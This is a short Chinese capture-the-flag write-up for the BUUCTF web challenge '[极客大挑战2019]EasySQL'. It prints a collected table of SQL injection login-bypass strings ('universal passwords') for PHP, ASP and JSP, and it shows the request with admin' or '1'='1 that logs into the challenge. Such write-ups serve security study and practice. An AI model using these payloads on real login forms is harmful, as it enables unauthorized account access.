CTF-Web-[极客大挑战2019]EasySQL
博客说明
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
CTP平台
网址
题目
Web类,[极客大挑战2019]EasySQL
打开题目的实例
思路
题目类型是Web类型的,而且是一个登录页面,首先考虑的是否是SQL注入,这里提供一下万能密码表
万能密码表(收集于网络)
| 语言 | 万能密码 |
|---|---|
| PHP | 'or 1=1/<br/>"or "a"="a<br/>"or 1=1--<br/>"or"="<br/>"or"="a'='a<br/>"or1=1--<br/>"or=or"<br/>''or'='or'<br/>') or ('a'='a<br/>'.).or.('.a.'='.a<br/>'or 1=1<br/>'or 1=1--<br/>'or 1=1/<br/>'or"="a'='a<br/>'or' '1'='1'<br/>'or''='<br/>'or''=''or''='<br/>'or'='1'<br/>'or'='or'<br/>'or.'a.'='a<br/>'or1=1--<br/>1'or'1'='1<br/>a'or' 1=1--<br/>a'or'1=1--<br/>or 'a'='a'<br/>or 1=1--<br/>or1=1-- |
| asp aspx | "or "a"="a<br/>'.).or.('.a.'='.a <br/>or 1=1--<br/>'or 1=1--<br/>a'or' 1=1--<br/>"or 1=1--<br/>'or.'a.'='a<br/>"or"="a'='a<br/>'or''='<br/>or'='or' |
| jsp | 1'or'1'='1<br/>admin' or 1=1/* |
查看源代码
发现是php写的,于是使用php的万能密码尝试
admin' or '1'='1拼接的sql语句为
username=admin' or '1'='1&password=admin' or '1'='1发现已经成功登录
感谢
BUUCTF以及勤劳的自己
java
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用。你还可以使用@来通知其他用户。